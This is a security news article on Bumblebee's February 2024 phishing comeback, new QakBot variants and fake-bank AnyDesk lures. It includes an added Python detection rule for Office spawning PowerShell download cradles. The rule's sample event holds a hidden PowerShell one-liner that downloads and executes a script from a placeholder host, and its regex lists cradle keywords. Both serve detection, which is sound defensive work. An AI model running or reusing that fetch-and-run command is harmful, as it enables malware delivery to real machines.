
Bumblebee malware makes a comeback and targets American businesses with new tricks.

14 February 2024 Newsroom Malware/Cybercrime

As part of a new phishing campaign that was noticed in February 2024, the notorious malware loader and initial access broker Bumblebee has returned after being missing for four months.

According to enterprise security company Proofpoint, the activity uses voicemail-themed lures with OneDrive URL links to target American businesses.

“One of the Word files the URLs led to was ‘ReleaseEvans#96.docm’ (the digits prior to the file extension varied),” according to a report released by the company on Tuesday. The Word document spoofed the consumer electronics company Humane.

When the document is opened, its VBA macros launch a PowerShell command that downloads and executes a second PowerShell script, which in turn retrieves and runs the Bumblebee loader.
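A detection rule for the Word-macro-to-PowerShell step described above, written here as an added example rather than Proofpoint's or Sophos's own tooling; the event field names follow Sysmon Event ID 1 / Windows 4688 conventions, the sample records are constructed, and the URL is a placeholder:

```python
"""Flag Office processes that spawn a PowerShell download cradle, the
macro-to-PowerShell step of the Bumblebee chain. Constructed events below
mirror Sysmon Event ID 1 / Windows 4688 field names; none is real telemetry."""
import re
from pathlib import PureWindowsPath

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELL_CHILDREN = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "mshta.exe"}
# Tokens typical of PowerShell download-and-execute one-liners (Sigma-style).
CRADLE_RE = re.compile(
    r"(downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient|"
    r"invoke-expression|\biex\b|-enc(odedcommand)?\b|start-bitstransfer)",
    re.IGNORECASE,
)

def _basename(path):
    return PureWindowsPath(path).name.lower()

def classify(event):
    """Return 'high', 'medium' or None for one process-creation event."""
    parent, child = _basename(event["ParentImage"]), _basename(event["Image"])
    if parent not in OFFICE_PARENTS or child not in SHELL_CHILDREN:
        return None
    # Any scripting host under Office is unusual; a download cradle is worse.
    if CRADLE_RE.search(event.get("CommandLine", "")):
        return "high"
    return "medium"

def triage(events):
    """Return (severity, host) pairs for events worth an analyst's time."""
    return [(sev, ev["Computer"]) for ev in events if (sev := classify(ev))]

# Constructed sample events (placeholder URL, not an indicator).
SAMPLE_EVENTS = [
    {"Computer": "WS01",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -w hidden -nop -c IEX (New-Object Net.WebClient)"
                    ".DownloadString('http://example.invalid/s.ps1')"},
    {"Computer": "WS02",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "Image": r"C:\Windows\System32\cmd.exe", "CommandLine": "cmd /c echo hello"},
    {"Computer": "WS03", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell Get-Process"},
]

if __name__ == "__main__":
    for severity, host in triage(SAMPLE_EVENTS):
        print(f"{severity.upper():6} {host}")
```

The "medium" tier exists because macro-blocking (noted later in the article) makes any shell spawned by an Office process rare enough to review, even without a recognisable cradle.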


The main purpose of Bumblebee, first discovered in March 2022, is to download and execute follow-up payloads such as ransomware. It has been used by numerous crimeware threat actors who had previously been seen delivering BazaLoader (also known as BazarLoader) and IcedID.

It is also thought to have been created by the cybercrime syndicates Conti and TrickBot as a replacement for BazarLoader. In September 2023, Intel 471 revealed a Bumblebee distribution campaign that used Web Distributed Authoring and Versioning (WebDAV) servers to distribute the loader.

The attack chain is notable for its reliance on macro-enabled documents, given that Microsoft began blocking macros by default in Office files downloaded from the internet in July 2022, a change that has pushed threat actors to alter and diversify their strategies.

The macro-based attack differs significantly from pre-hiatus campaigns that used HTML smuggling to drop a RAR file and took advantage of the WinRAR flaw known as CVE-2023-38831 to install the loader. These campaigns also included zipped LNK files containing Bumblebee executables or HTML attachments.

Bumblebee’s return coincides with the resurgence of new QakBot, ZLoader, and PikaBot iterations, as well as their distribution as Microsoft Software Installer (MSI) file samples.

According to cybersecurity company Sophos on Mastodon, “The .MSI drops a Windows .cab (Cabinet) archive, which in turn contains the DLL. The .MSI extracts the DLL from the .cab and runs it using shellcode.” The DLL then creates a second copy of itself and injects the shellcode into the memory space of the second instance.

The most recent QakBot artifacts, which use the crypter malware DaveCrypter to harden the encryption used to hide strings and other information, make analysis more difficult. Additionally, the ability to identify whether malware was active inside a virtual machine or sandbox has been restored by the new generation.


Another significant change is the use of AES-256, a more robust technique than the one used in earlier versions before QakBot’s infrastructure was dismantled in late August 2023, to encrypt all communications between the malware and the command-and-control (C2) server.

According to Andrew Brandt, principal researcher at Sophos X-Ops, “The destruction of the QakBot botnet infrastructure was a victory, but the bot’s creators are still free, and someone with access to the original source code has been testing the waters with these most recent variants.”

One of the most notable changes is that the attackers are restoring previously deprecated features, such as virtual machine (VM) awareness, and testing them out in these new versions. The bot also uses a different encryption algorithm to hide the default configurations hardcoded into it, making it harder for analysts to understand how the malware operates.

Behind FakeUpdates (also known as SocGholish), QakBot was the second most common malware for January 2024, surpassing other families such as Formbook, Nanocore, AsyncRAT, Remcos RAT, and Agent Tesla.

The development comes as Malwarebytes unveiled a new campaign in which phishing websites imitating financial institutions such as Barclays trick potential customers into downloading legitimate remote desktop software such as AnyDesk, purportedly to fix problems that never existed, ultimately giving threat actors access to the computer.
